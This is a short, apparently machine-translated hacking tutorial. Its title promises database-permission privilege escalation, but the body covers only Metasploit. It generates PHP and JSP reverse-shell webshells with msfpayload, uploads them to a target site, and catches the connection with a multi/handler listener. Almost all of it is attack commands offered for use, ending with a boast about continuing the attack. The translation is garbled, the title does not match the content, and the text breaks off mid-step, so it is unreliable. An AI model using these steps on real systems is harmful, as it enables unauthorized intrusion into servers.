DB_OWNER or sa permission backup detailed Elevation of Privilege from BAT file to startup Item

When the LINUX privilege escalation fails, MSF is often used ..

 
1. Generate a WEBSHELL File
Msf> msfpayload php/reverse_php LHOST = Your ip lport = port R> dis9.php
My BT4 is in the/ROOT/directory and can be run only after dis9.php is added.
Upload dis9.php to your SHELL, for example, www.dis9.com/dis9.php.
 
 
 
2. Then MSF sets the Interface Template and parameters.
Msf> use multi/handler // enter the multi/handler Interface
Msf exploit (handler)> set PAYLOAD php/reverse_php // If the Writing module is unclear, You can first look at info php/reverse_php.
Msf exploit (handler)> set LHOST your IP // generate the IP address of the dis9.php LHOST, that is, your IP address must be the same
Msf exploit (handler)> set LPORT 8080 // same as above
Msf exploit (handler)> exploit // Execute
 
 
 
3. Reverse SHELL
Then access your dis9.php
Root @ bt4: links www.dis9.com/dis9.php
In this way, a SHELL is rebounded.
We can continue fuck all.
 
//////////////////////////////////////// //////////////////////////////////////// /////////////////
JSP
Msfpayload java/jsp_shell_reverse_tcp LHOST = 192.168.10.1 R> balckrootkit. jsp
Msf> use exploit/multi/handler
Msf exploit (handler)> set PAYLOAD java/jsp_shell_reverse_tcp
Set PAYLOAD java/jsp_shell_reverse_tcp
Msf exploit (handler)> set LHOST 192.168.10.1
LHOST => 192.168.10.1
-------------------
No Default 4444 SET port exists.